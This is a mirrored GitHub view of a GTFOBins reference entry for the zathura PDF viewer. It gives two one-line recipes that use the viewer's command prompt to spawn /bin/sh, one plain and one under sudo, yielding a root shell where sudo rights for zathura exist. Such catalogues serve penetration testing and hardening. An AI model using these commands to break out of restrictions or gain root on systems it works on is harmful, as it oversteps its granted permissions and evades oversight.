1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/zathura.md
Andrea Cardaci 3cdfea5714 Promote zathura command to shell
Related to #293.
2022-06-08 13:41:44 +02:00

13 lines
283 B
Markdown

---
description: The interaction happens in a GUI window, while the shell is dropped in the terminal.
functions:
shell:
- code: |
zathura
:! /bin/sh -c 'exec /bin/sh 0<&1'
sudo:
- code: |
sudo zathura
:! /bin/sh -c 'exec /bin/sh 0<&1'
---